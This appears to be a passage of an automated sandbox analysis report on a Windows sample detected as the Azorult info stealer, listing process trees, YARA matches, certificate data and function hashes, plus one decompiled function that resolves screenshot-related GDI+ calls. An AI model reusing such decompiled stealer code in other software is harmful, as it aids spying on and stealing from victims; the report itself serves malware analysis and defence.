                                                                                                                                                                                        Mar 2, 2021 20:41:06.603687048 CET99.86.159.29443192.168.2.649732CN=*.liverpoolfc.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USFri Feb 12 01:00:00 CET 2021 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Mon Mar 14 00:59:59 CET 2022 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                                                                        CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                        CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                        CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                        Statistics

                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Behavior

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        System Behavior

                                                                                                                                                                                        Analysis Process: hfLfKDTosA.exe PID: 7100 Parent PID: 5956

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:20:40:58
                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                        Path:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:'C:\Users\user\Desktop\hfLfKDTosA.exe'
                                                                                                                                                                                        Imagebase:0xaa0000
                                                                                                                                                                                        File size:17616 bytes
                                                                                                                                                                                        MD5 hash:CF351C60783008409A564B31A5C38DD6
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Azorult, Description: detect Azorult in memory, Source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                        Analysis Process: hfLfKDTosA.exe PID: 4400 Parent PID: 7100

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:20:41:15
                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                        Path:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        Imagebase:0x3d0000
                                                                                                                                                                                        File size:17616 bytes
                                                                                                                                                                                        MD5 hash:CF351C60783008409A564B31A5C38DD6
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                        Analysis Process: hfLfKDTosA.exe PID: 6420 Parent PID: 7100

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:20:41:15
                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                        Path:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        Imagebase:0x7e0000
                                                                                                                                                                                        File size:17616 bytes
                                                                                                                                                                                        MD5 hash:CF351C60783008409A564B31A5C38DD6
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Azorult_1, Description: Azorult Payload, Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                                                                                                                        • Rule: Azorult, Description: detect Azorult in memory, Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                        Disassembly

                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                        Reset < >

                                                                                                                                                                                          Analysis Process: hfLfKDTosA.exe PID: 7100 Parent PID: 5956 hfLfKDTosA.exeCOMMON

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 0141D004, Relevance: .2, Instructions: 233COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 754412a1161cbff26b0407b9f1dcfd95a4d22e3adc33da233e51abb31a4aab23
                                                                                                                                                                                          • Instruction ID: e6a7cf6df2055470336fc1e422808bc7930a3d2a572299804ee22a4b9d8e30ba
                                                                                                                                                                                          • Opcode Fuzzy Hash: 754412a1161cbff26b0407b9f1dcfd95a4d22e3adc33da233e51abb31a4aab23
                                                                                                                                                                                          • Instruction Fuzzy Hash: 92918135E103199FCB04DBA4D8549DDBBBAFF89304F158615E515AF3A4EB30A88ACB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0141F470, Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a14cb29779dde6b9c42229de18ae13b5e0d23796ed3c912b41df4a13891522c4
                                                                                                                                                                                          • Instruction ID: 247cf0477514a88ecb30a93aec43ea1fea542286ac9b9b470e948aca3b721a62
                                                                                                                                                                                          • Opcode Fuzzy Hash: a14cb29779dde6b9c42229de18ae13b5e0d23796ed3c912b41df4a13891522c4
                                                                                                                                                                                          • Instruction Fuzzy Hash: F181A235E103199FCB04DFF0D8948DDBBBAFF89304B148215E515AB3A4EB30A889CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0141F020, Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: eedb934dea337f43fd2c8c3d6be1b54e352a14e1eb912aeac88b8d43cc9c7a35
                                                                                                                                                                                          • Instruction ID: ab6dc3223adeeea33968c8c7f779f498e198a0b1eca039420a986be1bfd964e3
                                                                                                                                                                                          • Opcode Fuzzy Hash: eedb934dea337f43fd2c8c3d6be1b54e352a14e1eb912aeac88b8d43cc9c7a35
                                                                                                                                                                                          • Instruction Fuzzy Hash: AB9163708093889FCB06CFB9C8945DDBFB1EF4A300F1981ABE584AB666D330595ACF51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01418968, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 01418BAE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                          • Opcode ID: e493fc44344219917db8c1b0ab5e1a91766456db93638b768528a7057e99fa34
                                                                                                                                                                                          • Instruction ID: c9d2ae86ea0a1d5204bdc12dde7a81116b0a7367ddf012375bd67f4f6c2c5971
                                                                                                                                                                                          • Opcode Fuzzy Hash: e493fc44344219917db8c1b0ab5e1a91766456db93638b768528a7057e99fa34
                                                                                                                                                                                          • Instruction Fuzzy Hash: 437125B1A00B068FD724DF2AD45079BBBF1BF88244F00892ED58AD7B54E774E9468F91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0141CFB4, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0141F28A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                          • Opcode ID: e40cddaacc8f9deb73e18382ac2809bc130c135de0746880681ddeab95a7cb9b
                                                                                                                                                                                          • Instruction ID: 10559cbace6f87447f19a65e21d588ce915ec8e0b56ab641346f96311272123e
                                                                                                                                                                                          • Opcode Fuzzy Hash: e40cddaacc8f9deb73e18382ac2809bc130c135de0746880681ddeab95a7cb9b
                                                                                                                                                                                          • Instruction Fuzzy Hash: C851C1B5D00349DFDB14CF99C884ADEBBB5FF48314F24812AE819AB214D775994ACF90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0141CF37, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0141F41D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1378638983-0
                                                                                                                                                                                          • Opcode ID: f216c2730a77bf31dcd8b46786040c24504d7f2d6c0a26018ce927feec147e5e
                                                                                                                                                                                          • Instruction ID: 066d0d86a2509a7b9a8697836be9f421f28103d45c877c4642caea1b042483e1
                                                                                                                                                                                          • Opcode Fuzzy Hash: f216c2730a77bf31dcd8b46786040c24504d7f2d6c0a26018ce927feec147e5e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3921D3B18053888FDB01DFA8D8847DEBFF4EF59214F15845AD544A7351D334A90ACBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01419324, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0141B246,?,?,?,?,?), ref: 0141B307
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                          • Opcode ID: 3c7db39be2dc2df622d87da86e1ac925322888e04370c867815567f5793d1810
                                                                                                                                                                                          • Instruction ID: 31fa7389d94342aab524f3a3013885fe3c0f3ec08324601f5d660588a1ff3bb3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c7db39be2dc2df622d87da86e1ac925322888e04370c867815567f5793d1810
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6721C4B5900248EFDB10CF99D884AEEBBF8EB49324F14841AE955B7310D374A955CFA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0141B278, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0141B246,?,?,?,?,?), ref: 0141B307
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                          • Opcode ID: 6b012fb4505300bf266bf428366fac436ae5edba0e55232c4f82d1eb9926565d
                                                                                                                                                                                          • Instruction ID: 910e5e4db718a6f1cc823137bd7855420d7d235f58f5480dfae5acda1fca1365
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b012fb4505300bf266bf428366fac436ae5edba0e55232c4f82d1eb9926565d
                                                                                                                                                                                          • Instruction Fuzzy Hash: E621E3B5900248DFDB10CFA9D584AEEBBF5EF48324F14841AE958B3310D378A955CF61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01417D18, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,01418C29,00000800,00000000,00000000), ref: 01418E3A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                          • Opcode ID: 35472b3e8f161d81efde35e49ebdb2492adb70c972a9cf6f45c8662b9c523b6a
                                                                                                                                                                                          • Instruction ID: 53016432bc6409044446670696eea5f4630e79c1bac0896480ced144a77fc2e7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 35472b3e8f161d81efde35e49ebdb2492adb70c972a9cf6f45c8662b9c523b6a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 901103B69003499FDB10CF9AC484BDEBBF4EB88324F00842AE519B7310C375A945CFA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01418DC8, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,01418C29,00000800,00000000,00000000), ref: 01418E3A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                          • Opcode ID: 82af02f37bd37793a5273cb8fb48a655e0bdca0a2df96ab9b3e83a98dcbfba87
                                                                                                                                                                                          • Instruction ID: a72067f92d219bc34177f29af0aee5c02bbb651a33a6e8748af12b33758a3140
                                                                                                                                                                                          • Opcode Fuzzy Hash: 82af02f37bd37793a5273cb8fb48a655e0bdca0a2df96ab9b3e83a98dcbfba87
                                                                                                                                                                                          • Instruction Fuzzy Hash: E31103B69003498FDB10CFAAD484BDEBBF4EB89324F14842AE519B7710C375A945CFA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01417458, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 014174CD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                          • Opcode ID: f0b6338c26f167e773d96f9616e02300a03ee523d3582e7e2be7ae8725d5a847
                                                                                                                                                                                          • Instruction ID: 7481e71c52424565328e2a9c5d930d244a8ac116e3facb7ae4485b66000d3c9a
                                                                                                                                                                                          • Opcode Fuzzy Hash: f0b6338c26f167e773d96f9616e02300a03ee523d3582e7e2be7ae8725d5a847
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E21CA75804784CFDB11CFA8D0483EEBFF0EF09328F14849AD495AB642C739A649CBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01417468, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 014174CD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                          • Opcode ID: 432a5e8c07a9028a2897053ee74ff31aa785bb3fc85b3d28328e657f096abe6e
                                                                                                                                                                                          • Instruction ID: baf04ae55fd842a0bd67d6cb45e93a4b5044bdc443caf98b8d5d503908e379db
                                                                                                                                                                                          • Opcode Fuzzy Hash: 432a5e8c07a9028a2897053ee74ff31aa785bb3fc85b3d28328e657f096abe6e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8411BC75804798CFDB21CF99D0483EEBFF4EB09328F04846AD495A7241C779AA44CBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01418B48, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 01418BAE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                          • Opcode ID: c0c4ab4933f860e057d6571d1177de3e50c14229585164501495c940d14aca19
                                                                                                                                                                                          • Instruction ID: 4212f99de1673f31dc7da47419de538df9f88512eaa12f4e24ef212e2ea2e8d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: c0c4ab4933f860e057d6571d1177de3e50c14229585164501495c940d14aca19
                                                                                                                                                                                          • Instruction Fuzzy Hash: 071113B5C006498FDB10CF9AC444BDEFBF4EB88324F10841AD529A7310C374A646CFA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0141CFEC, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0141F41D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1378638983-0
                                                                                                                                                                                          • Opcode ID: b55b6d4f8d825608790b1625879c1f981bb60b458c213cd91185a67caa163c6e
                                                                                                                                                                                          • Instruction ID: 1f5aef8e7bbbe8954203fe1f8ce77f507bcff405ab6e1f8a247a0f92aed6b032
                                                                                                                                                                                          • Opcode Fuzzy Hash: b55b6d4f8d825608790b1625879c1f981bb60b458c213cd91185a67caa163c6e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 251106B59002589FDB10DF99D484BDEBBF8EB48324F10841AE915A7300D374A949CFA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0141F3B8, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0141F41D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1378638983-0
                                                                                                                                                                                          • Opcode ID: 61c9d7d78091ba58e268495b4a0d21b5b293786cd8daf6a67353ce9117ccce86
                                                                                                                                                                                          • Instruction ID: 7fc613c6343a7cb71b64c48cb1b33a197500b33940de8ce694e4b9478ecc4652
                                                                                                                                                                                          • Opcode Fuzzy Hash: 61c9d7d78091ba58e268495b4a0d21b5b293786cd8daf6a67353ce9117ccce86
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E1133B58002898FDB10CF99D588BDEBBF4EB58324F14841AD559B7700D374A949CFA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 0141B184, Relevance: .3, Instructions: 265COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c559eba01096f7a7709b079315b7df241cf2979d0dc258e3ed13192aa23d8b9a
                                                                                                                                                                                          • Instruction ID: a965539577a845015ec296b6a85ad8427939ea3f968ff7c3ba6ce670da64839c
                                                                                                                                                                                          • Opcode Fuzzy Hash: c559eba01096f7a7709b079315b7df241cf2979d0dc258e3ed13192aa23d8b9a
                                                                                                                                                                                          • Instruction Fuzzy Hash: BBA17172E0021A8FCF05DFA5C9885DEBBB2FF85300B15856AE915BB225DB31E946CF40
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Analysis Process: hfLfKDTosA.exe PID: 6420 Parent PID: 7100 hfLfKDTosA.exeCOMMON

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00417B1A, Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00417B1A() {
				void* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t21;

				 *0x41c890 =  *0x41c890 - 1;
				if( *0x41c890 < 0) {
					_t2 = LoadLibraryA("crtdll.dll"); // executed
					 *0x41c868 = GetProcAddress(_t2, "wcscmp");
					_t4 = LoadLibraryA("Gdiplus.dll"); // executed
					 *0x41c86c = GetProcAddress(_t4, "GdiplusStartup");
					 *0x41c870 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdiplusShutdown");
					 *0x41c874 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipCreateBitmapFromHBITMAP");
					 *0x41c878 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncodersSize");
					 *0x41c87c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncoders");
					 *0x41c880 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipDisposeImage");
					 *0x41c884 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipSaveImageToStream");
					 *0x41c888 = GetProcAddress(LoadLibraryA("ole32.dll"), "CreateStreamOnHGlobal");
					_t21 = GetProcAddress(LoadLibraryA("ole32.dll"), "GetHGlobalFromStream");
					 *0x41c88c = _t21;
					return _t21;
				}
				return _t1;
			}







                                                                                                                                                                                          0x00417b1c
                                                                                                                                                                                          0x00417b23
                                                                                                                                                                                          0x00417b33
                                                                                                                                                                                          0x00417b3e
                                                                                                                                                                                          0x00417b4d
                                                                                                                                                                                          0x00417b58
                                                                                                                                                                                          0x00417b72
                                                                                                                                                                                          0x00417b8c
                                                                                                                                                                                          0x00417ba6
                                                                                                                                                                                          0x00417bc0
                                                                                                                                                                                          0x00417bda
                                                                                                                                                                                          0x00417bf4
                                                                                                                                                                                          0x00417c0e
                                                                                                                                                                                          0x00417c23
                                                                                                                                                                                          0x00417c28
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417c28
                                                                                                                                                                                          0x00417c2d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 00417B33
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417B39
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B4D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B53
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B67
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B6D
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B81
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B87
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B9B
